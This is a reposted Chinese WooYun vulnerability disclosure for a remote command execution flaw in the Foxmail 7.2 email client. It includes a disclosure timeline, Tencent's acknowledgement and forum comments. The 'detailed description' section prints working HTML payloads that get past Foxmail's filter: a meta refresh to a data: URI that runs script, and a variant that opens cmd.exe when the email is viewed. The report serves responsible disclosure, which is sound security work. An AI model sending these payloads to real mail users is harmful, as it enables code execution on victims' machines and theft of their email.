Foxmail邮件客户端远程命令执行漏洞

admin
admin
admin
105013
文章
87
评论
2017年4月25日00:48:44评论535 views字数 212阅读0分42秒阅读模式
摘要

2016-03-03: 细节已通知厂商并且等待厂商处理中
2016-03-04: 厂商已经确认,细节仅向厂商公开
2016-03-07: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2016-04-28: 细节向核心白帽子及相关领域专家公开
2016-05-08: 细节向普通白帽子公开
2016-05-18: 细节向实习白帽子公开
2016-06-02: 细节向公众公开

漏洞概要 关注数(180) 关注此漏洞

缺陷编号: WooYun-2016-180424

漏洞标题: Foxmail邮件客户端远程命令执行漏洞 Foxmail邮件客户端远程命令执行漏洞

相关厂商: 腾讯

漏洞作者: 数据流Foxmail邮件客户端远程命令执行漏洞

提交时间: 2016-03-03 13:11

公开时间: 2016-06-02 09:30

漏洞类型: 远程代码执行

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 远程代码执行 客户端安全

32人收藏

漏洞详情

披露状态:

2016-03-03: 细节已通知厂商并且等待厂商处理中
2016-03-04: 厂商已经确认,细节仅向厂商公开
2016-03-07: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2016-04-28: 细节向核心白帽子及相关领域专家公开
2016-05-08: 细节向普通白帽子公开
2016-05-18: 细节向实习白帽子公开
2016-06-02: 细节向公众公开

简要描述:

Foxmail最新版7.2远程命令执行,点开邮件就执行

详细说明:

Foxmail邮件客户端远程命令执行漏洞

Foxmail邮件客户端远程命令执行漏洞

Foxmail本身对邮件的body是有XSS filter的,但发现支持<meta>标签。

meta可以干很多事情,可以自定义一个http head等,foxmail并未对meta标签的内容进行检测

以下是能执行XSS的verctor

code 区域 
<meta http-equiv="refresh" content="0; url=data:text/html,%3Cscript%3Ealert%281%29%3C%2fscript%3E">

Foxmail邮件客户端远程命令执行漏洞

这个verctor是挺有意思的 ,利用meta标签,添加一个refresh属性,可以设置时间,这里设置的是0秒,就是立即跳转,使当前页面重定向,而重定向的页面就是data伪协议

code 区域 
data:text/html,<script>alert(1)</script>

。相当于把页面重定向到另外一个带js的页面了,从而突破Foxmail本身的防御策略。

用meta和data伪协议这种verctor在一般网页上或许没什么用处,因为data伪协议是独立的空白域,也就是说一般不在任何域内,不像普通的xss就直接能获取当前域内的信息。而这种xss在客户端内就大有用处了。

利用XSS执行命令

code 区域 
<meta http-equiv="refresh" content="0; url=data:text/html,%3Cscript%3Ewindow.open%28%27file%3A%2f%2fC%3A%2fwindows%2fsystem32%2fcmd.exe.%27%29%3C%2fscript%3E">

利用客户端的缺陷可以直接使用open打开任意程序

对 file://C:/windows/system32/cmd.exe这样的路径Foxmail本身是无法执行的,但在后面加一个"."就能突破

漏洞证明:

点击邮箱就执行

Foxmail邮件客户端远程命令执行漏洞

修复方案:

对meta标签进行过滤

版权声明:转载请注明来源 数据流@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-03-04 09:26

厂商回复:

非常感谢您的报告,问题已着手处理,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2016-03-03 13:11 | 牛肉包子 ( 普通白帽子 | Rank:307 漏洞数:70 | baozisec)

    3

    前排

  2. 2016-03-03 13:17 | 萨瓦迪卡 ( 普通白帽子 | Rank:128 漏洞数:21 | 黑太子)

    2

    six six six

  3. 2016-03-03 13:17 | 风格 ( 实习白帽子 | Rank:37 漏洞数:12 | 注册为白帽子,你可以在这里提交你发现的漏...)

    2

    前排

  4. 2016-03-03 13:19 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:208 | px1624)

    2

    mark

  5. 2016-03-03 13:22 | mango ( 核心白帽子 | Rank:2185 漏洞数:312 | 解决问题的第一步,是要承认问题的存在。)

    2

    6

  6. 2016-03-03 13:30 | 泳少 ( 普通白帽子 | Rank:257 漏洞数:84 | ★ 梦想这条路踏上了,跪着也要...)

    2

    跳蛋流要变邮箱流了?

  7. 2016-03-03 13:44 | answer Foxmail邮件客户端远程命令执行漏洞 ( 普通白帽子 | Rank:453 漏洞数:54 | 答案)

    2

    前排

  8. 2016-03-03 13:52 | Sevck ( 路人 | Rank:2 漏洞数:2 )

    2

    屌屌的

  9. 2016-03-03 13:54 | xsser Foxmail邮件客户端远程命令执行漏洞 ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)

    2

    这个还得突破下

  10. 2016-03-03 14:00 | 数据流 Foxmail邮件客户端远程命令执行漏洞 ( 普通白帽子 | Rank:817 漏洞数:100 | 没关系啊,我们还有音乐)

    2

    @xsser 嗯 还能干其他事情,例如窃取邮件啥的

  11. 2016-03-03 14:07 | Praise ( 路人 | Rank:10 漏洞数:1 | null 开心就要笑得如痴如醉~)

    2

    Mark

  12. 2016-03-03 14:28 | Mark0smith ( 普通白帽子 | Rank:176 漏洞数:71 )

    2

  13. 2016-03-03 14:58 | 随风的风 ( 普通白帽子 | Rank:259 漏洞数:96 | 微信公众号:233sec 不定期分享各种漏洞思...)

    2

    收藏。。

  14. 2016-03-03 16:18 | 梧桐雨 Foxmail邮件客户端远程命令执行漏洞 ( 核心白帽子 | Rank:1662 漏洞数:191 | 学无止境)

    2

    流哥最近高产呀,关注。

  15. 2016-03-03 16:24 | 秦风 ( 实习白帽子 | Rank:40 漏洞数:10 | 血染江山的画 怎敌妳眉间一点朱砂 覆...)

    2

    mark

  16. 2016-03-03 16:24 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

    2

    666

  17. 2016-03-03 16:31 | blast ( 普通白帽子 | Rank:373 漏洞数:60 | Destruction brings construction)

    2

    跳哥……蛋哥威武

  18. 2016-03-03 16:36 | 数据流 Foxmail邮件客户端远程命令执行漏洞 ( 普通白帽子 | Rank:817 漏洞数:100 | 没关系啊,我们还有音乐)

    2

    @梧桐雨 (ง •̀_•́)ง

  19. 2016-03-03 16:36 | 数据流 Foxmail邮件客户端远程命令执行漏洞 ( 普通白帽子 | Rank:817 漏洞数:100 | 没关系啊,我们还有音乐)

    2

    @blast 翔哥你好 (ง •̀_•́)ง

  20. 2016-03-03 20:55 | Sct7p ( 实习白帽子 | Rank:62 漏洞数:9 | 懂与不懂之间只隔了一层纸,懂的人会觉得很...)

    2

    666666666666666

  21. 2016-03-04 09:30 | 无名 ( 实习白帽子 | Rank:41 漏洞数:9 | 我是一只小菜鸟呀,伊雅伊尔哟。)

    2

    6666666

  22. 2016-03-04 09:53 | Neeke ( 普通白帽子 | Rank:110 漏洞数:26 | 额滴歌神呀!)

    2

    吓得我赶紧把foxmail卸载了

  23. 2016-03-04 11:38 | Jovi ( 路人 | Rank:4 漏洞数:1 )

    2

    666666666

  24. 2016-03-07 10:25 | Lar2y ( 实习白帽子 | Rank:31 漏洞数:12 | 有活跃团队要人么?求带飞)

    2

    好可怕

  25. 2016-03-07 10:26 | Lar2y ( 实习白帽子 | Rank:31 漏洞数:12 | 有活跃团队要人么?求带飞)

    2

    吓得我把乌云都关了

  26. 2016-03-07 11:02 | AK-47 ( 实习白帽子 | Rank:78 漏洞数:11 | 开开心心挖洞,踏踏实实上学!)

    2

    MARK

  27. 2016-03-07 19:59 | 未了 ( 路人 | Rank:2 漏洞数:3 )

    2

    酷派安全应急响应中心:卧槽 叼叼叼

  28. 2016-03-11 10:23 | 小恒-blog ( 路人 | Rank:2 漏洞数:1 | 开始我是拒绝的,但是我要试一试,没有想到...)

    2

    厉害啊 啊啊呵呵呵

  29. 2016-03-19 15:27 | biubiu ( 路人 | Rank:18 漏洞数:6 | 我是流氓我怕谁)

    1

    来站位

  30. 2016-05-11 14:34 | Martial ( 普通白帽子 | Rank:2639 漏洞数:370 | 竟然还有人冒充我,醉了,骗子QQ445697541...)

    0

    有人成功了么

  31. 2016-06-02 09:42 | Sophone ( 路人 | Rank:6 漏洞数:5 | 屌丝一枚 共同学习)

    0

    新版本还有。。。。。

  32. 2016-06-02 09:56 | 未了 ( 路人 | Rank:2 漏洞数:3 )

    0

    叼叼叼

  33. 2016-06-02 10:10 | 未了 ( 路人 | Rank:2 漏洞数:3 )

    0

    verctor?vector?

  34. 2016-06-02 10:17 | 未了 ( 路人 | Rank:2 漏洞数:3 )

    0

    Html Email

  35. 2016-06-02 11:06 | Me_Fortune ( 普通白帽子 | Rank:361 漏洞数:115 | The quiter you are,the more you're able ...)

    0

    @Martial @Sophone没成功浮现啊 。。。

  36. 2016-06-06 07:06 | 黑暗两匹狼 ( 路人 | Rank:10 漏洞数:2 | Anything)

    0

    这个太牛逼

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin